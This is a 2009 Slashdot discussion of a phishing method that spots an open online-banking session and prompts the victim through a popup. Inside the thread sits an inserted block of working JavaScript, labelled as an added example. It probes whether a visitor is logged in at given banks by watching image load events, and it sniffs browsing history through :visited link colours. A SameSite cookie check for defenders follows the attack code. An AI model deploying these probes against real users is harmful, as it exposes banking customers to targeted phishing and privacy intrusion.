
Security IT

Phishing For Bank Info Without Any Pesky Malware

Posted by timothy
from the but-the-convenience-is-incredible dept.
Emb3rz writes "DarkReading.com brings us news of a new approach to phishing that targets online banking sites. Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript from a remote page to detect if you have a banking site open, and prompts you for info via popup if you do."

  • XSS (Score:5, Informative)

    by AKAImBatman (238306) on Friday January 16, 2009 @12:08AM (#26478671)

    Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love.

    A cross-site scripting attack sounds like a pretty typical attack vector to me. Javascript should not be able to "detect" if they have a banking site open. Pure and simple.

  • by Anonymous Coward on Friday January 16, 2009 @12:10AM (#26478679)

    I've heard of something like this before.
    Though there's this magical thing called NoScript.
    If people would stop putting law before them to prevent them from making stupid choices, then we might have a more informed society.
    (I ironically didn't read TFA.)

  • Simple Solution... (Score:5, Informative)

    by Klootzak (824076) on Friday January 16, 2009 @12:12AM (#26478691)

    Don't have multiple tabs/windows open while you're doing your online banking!!!

    Oh, and use NoScript! [noscript.net]

  • by Klootzak (824076) on Friday January 16, 2009 @12:24AM (#26478759)

    Yelling "Install NoScript you n00bs!!!" won't register noobs... because they're newbs.

    Well, I wouldn't call them n00bs firstly... and secondly, most of the technically-savvy geeks/nerds I know read Slashdot and find out new and interesting stuff from here.

    One of the best things about Slashdot is if you write something on here, a lot of people will take notice. So if by providing solutions/information that people can read and take away to tell other non-technically-savvy individuals helps protect at least one person from being scammed, I'm more than happy to yell on Slashdot about it ;)

  • by dmomo (256005) on Friday January 16, 2009 @01:04AM (#26478967)

    I agree. Most XSS attacks would require the banking site to have a vulnerability. This article implies that all one needs is a vulnerability on the first (high-profile) site.

  • by totally bogus dude (1040246) on Friday January 16, 2009 @04:04AM (#26479671)

    It's explained in a few comments above. You just reference a resource (usually an image) that requires you to be logged in at the target site in order to access. If your attempt fails, the user isn't logged in at that site. If it succeeds, you know the user is currently logged in.

  • by thetartanavenger (1052920) on Friday January 16, 2009 @05:35AM (#26480057)

    NoScript breaks my online banking. Yeah it's a good idea and I tried to use it for a while, but I found that no matter what exceptions I gave it when it came to my bank, it refused to allow me access. Don't know why, but it kinda kills your argument if you have to turn NoScript off completely to use your online banking.

  • by DigitAl56K (805623) on Friday January 16, 2009 @05:48AM (#26480111)

    Problem is with no-script you still have to decide if you trust or not-trust the site and if that level of trust you have is worth what the site is offering.

    That slightly over-simplifies the protection that NoScript offers. For example, even when you allow script to run NoScript still provides protection against certain types of XSS, you can use it to force cookies to be exchanged over https for certain domains, it can block some plug-in types (Java, Flash, Silverlight), it features click-jacking protection, and just a couple of days ago it even added protection against attacks on twitter [hackademix.net].

    So yes, you do have to make that trade-off, but even when you click "allow" you're potentially better off with NoScript installed than without it.

  • by sincewhen (640526) on Friday January 16, 2009 @06:42AM (#26480363)
  • No passwords (Score:2, Informative)

    by Haiyadragon (770036) on Friday January 16, 2009 @07:20AM (#26480525)

    Over here in the Netherlands most banks (maybe all) don't use passwords. In my case I have a card reader that will generate a code after I give it my card, PIN number and a code generated by the website. I have to do this to log in and to initiate transactions. That makes this attack pretty useless. Also, a prompt should always clearly indicate by which website it was called and it shouldn't block other tabs.

  • Re:XSS (Score:1, Informative)

    by Anonymous Coward on Friday January 16, 2009 @07:27AM (#26480573)

    The script doesn't access the image, it just gets the information that loading the image succeeded or resulted in an error. Third party images are a very common thing on the web. You may be able to find an option in your browser for disabling third party content (everything not coming from within the same domain/path as the HTML document holding it all together), but if you turn off third party content, many pages will stop working or miss lots of pictures (on the plus side, you won't be seeing many ads either).

    A naive approach would be to limit the events fired by the image (onerror and onload) to scripts which have the same origin as the image. That wouldn't stop the attack though, because images influence the layout: The script could test if the image has loaded by looking at pixel distances on the page. A similar attack can be used to see if you have visited a particular page within the time that your browsing history covers (usually 7-14 days). To do that, a script can look at the color of a link. If it's the color of visited links, you've been there. This attack does not load anything from the server, so it would be a useful pre-test to see if you actually use online banking and at which bank. Then the image loading detection routine only needs to be performed for that bank.

    In essence, if you do anything that you have to log in for, turn off your browsing history and browse like it's 1994: One page at a time, no tabs.
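
    The login-state probe that totally bogus dude and the Anonymous Coward above describe (an image the bank only serves to a logged-in session, observed through onload/onerror), plus the :visited link-colour history check, as an added JavaScript example. This is not code from the DarkReading article or from any poster in the thread. The bank hostnames, image paths, colours and the Set-Cookie strings are placeholders; the browser-only pieces (Image, getComputedStyle) are wrapped so the decision logic can also be exercised outside a browser with a fake loader. The last function is the defender's side of the same question: would the browser even attach the session cookie to the cross-site image request?

```javascript
// Added example, not code from the article or from any poster in the thread.
// Attacker side: the login-state probe via an image that the bank only serves
// to a logged-in session, and the 2009-era :visited history check.
// Defender side: a check of whether a Set-Cookie header would let the browser
// attach the session cookie to that cross-site image request at all.
// Hostnames, paths and colours below are placeholders (assumptions).

// Each entry points at a resource the bank would only return with a valid
// session cookie (anything else answers 403, a login redirect, or HTML,
// all of which make an <img> fire onerror instead of onload).
const PROBES = [
  { bank: "example-bank-a", url: "https://bank-a.example/account/avatar.png" },
  { bank: "example-bank-b", url: "https://bank-b.example/secure/logo.gif" },
];

// Browser loader: a real <img>. The page never reads the pixels; it only
// learns which of the two events fired, which the same-origin policy permits.
function browserImageLoader(url, handlers) {
  const img = new Image();
  img.onload = handlers.onload;
  img.onerror = handlers.onerror;
  img.src = url;
}

// Runs every probe through `loadImage` (injected so the logic also runs in
// Node with a fake loader) and reports which banks look logged in.
function probeLoggedInBanks(probes, loadImage, onDone) {
  const results = [];
  let pending = probes.length;
  if (pending === 0) { onDone(results); return; }
  for (const p of probes) {
    const finish = (loggedIn) => {
      results.push({ bank: p.bank, loggedIn });
      if (--pending === 0) onDone(results);
    };
    loadImage(p.url, { onload: () => finish(true), onerror: () => finish(false) });
  }
}

// History probe: with a stylesheet rule such as `a:visited { color: #800080 }`,
// render a link to each candidate and ask which colour was painted.
// `computeLinkColor` is injected for the same reason as `loadImage`.
function visitedColorProbe(urls, computeLinkColor, visitedColor) {
  return urls.filter((u) => computeLinkColor(u) === visitedColor);
}

function browserLinkColor(url) {
  const a = document.createElement("a");
  a.href = url;
  document.body.appendChild(a);
  const color = getComputedStyle(a).color;
  a.remove();
  return color;
}

// Defender's check: the image probe only works if the browser sends the bank's
// session cookie on a cross-site <img> request. SameSite=Lax or Strict
// withholds it; SameSite=None sends it; no attribute is treated here as the
// worst case (older browsers send it; Chrome now defaults to Lax).
function cookieSentOnCrossSiteImage(setCookieHeader) {
  const attrs = setCookieHeader
    .split(";")
    .slice(1)
    .map((s) => s.trim().toLowerCase());
  const sameSite = attrs.find((a) => a.startsWith("samesite="));
  if (!sameSite) return true;
  return sameSite.slice("samesite=".length).trim() === "none";
}

// Stand-alone demo: only meaningful in a browser; a no-op under Node.
if (typeof Image !== "undefined" && typeof document !== "undefined") {
  probeLoggedInBanks(PROBES, browserImageLoader, (results) => {
    // In the real attack this is where the fake "session expired" popup
    // would be shown for each bank reporting loggedIn === true.
    console.log(results);
  });
}
```

    The defender's function is the one worth running against your own bank's Set-Cookie header: with SameSite=Lax or Strict on the session cookie, the cross-site image load arrives unauthenticated and every bank reports loggedIn === false no matter what session the user really has. The :visited probe is included because the comment describes it; current browsers deliberately report the unvisited colour from getComputedStyle for exactly this reason, so expect visitedColorProbe to come back empty today.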

  • by blueg3 (192743) on Friday January 16, 2009 @09:51AM (#26481653)

    When you're currently visiting one site, and open a new tab and go to a different site, those two open tabs should have no capacity to share information -- they should function as if they were separate browser sessions. (Obviously this isn't the same as if you clicked on something in a tab that causes another tab or window to open, as they may need to share knowledge. But then, the fact that those two tabs/windows are tied to the same context should be made apparent to the user.)
